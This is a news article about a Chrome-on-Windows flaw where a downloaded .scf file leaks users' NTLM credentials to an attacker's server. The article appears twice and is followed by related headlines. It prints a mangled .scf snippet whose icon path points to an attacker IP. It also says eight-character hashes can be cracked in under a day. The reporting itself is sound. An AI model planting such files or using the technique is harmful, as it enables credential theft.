Date:19/05/17
The Google`s Chrome team is working to fix a bug that allows the credential theft. The vulnerability can be exploited by hackers if the browser is running on Windows.
The attack is successful if hackers manage to cheat the victim to click on a link downloading a Windows .scf file (the old Shell Command File format, a shortcut to Show Desktop since Windows 98), said the Defense Code`s cybersecurity experts who have discovered the issue.
In practice, this exploits the way Chrome and Windows handle .scf files is exploited.
Most download links are sanitized by Chrome, adding the .download extension onto Windows LNK files but not .scf files.
That can happen, if the user clicks on the link, then the malicious .scf file will remain dormant in the Downloads directory until the victim reopens the folder.
This is exactly where the Windows vulnerability consists because viewing the folder will trigger Windows to try and retrieve an icon associated with the .scf file.
To retrieve the icon, the victim's device will present credentials to the server - their user ID and hashed password on a corporate network, or the home group's credentials if the computer is personal.
In this way, the credentials become available to hackers.
If the .scf file contains a specific code, then the user ID and hashed password will be presented to the attacker's IP:
Shell]
IconFile=\170.170.170.170icon
The user ID and the hashed password can be presented to other services, although recovery of an NTLMv2 hashed password will require offline brute-force cracking.
The password brute-forcing is actually an average difficulty attack, but a NVIDIA GTX 1080 card can recover an eight-character password in less than a day.
Google has announced that it is aware of the problem and is working on the fixes.
Chrome has credential theft bug
The Google`s Chrome team is working to fix a bug that allows the credential theft. The vulnerability can be exploited by hackers if the browser is running on Windows.The attack is successful if hackers manage to cheat the victim to click on a link downloading a Windows .scf file (the old Shell Command File format, a shortcut to Show Desktop since Windows 98), said the Defense Code`s cybersecurity experts who have discovered the issue.
In practice, this exploits the way Chrome and Windows handle .scf files is exploited.
Most download links are sanitized by Chrome, adding the .download extension onto Windows LNK files but not .scf files.
That can happen, if the user clicks on the link, then the malicious .scf file will remain dormant in the Downloads directory until the victim reopens the folder.
This is exactly where the Windows vulnerability consists because viewing the folder will trigger Windows to try and retrieve an icon associated with the .scf file.
To retrieve the icon, the victim's device will present credentials to the server - their user ID and hashed password on a corporate network, or the home group's credentials if the computer is personal.
In this way, the credentials become available to hackers.
If the .scf file contains a specific code, then the user ID and hashed password will be presented to the attacker's IP:
Shell]
IconFile=\170.170.170.170icon
The user ID and the hashed password can be presented to other services, although recovery of an NTLMv2 hashed password will require offline brute-force cracking.
The password brute-forcing is actually an average difficulty attack, but a NVIDIA GTX 1080 card can recover an eight-character password in less than a day.
Google has announced that it is aware of the problem and is working on the fixes.
Views: 476
©ictnews.az. All rights reserved.
Similar news
- Cellphone Use May Raise Cancer Risk
- Australian police pushes cyber safety education
- Vietnam aims to lead in e-government
- Senate Website Gets Hacked
- US builds net for cyber war games
- Japan enacts anti-computer virus law
- India passes law vs e-waste
- Anonymous Declares War On The City Of Orlando
- Microsoft highlights evolving dangers as online identity data proliferates
- Consumers want internet security to be provided by banks
- Government facilities targets of cyber attack
- South Korean web attacks might been war drill
- Sri Lanka to Establish National Passport Database to Increase Border Security
- Hi-tech crime agencies set to employ information security professionals
- Phone hacking and online campaign bring down the News of the World
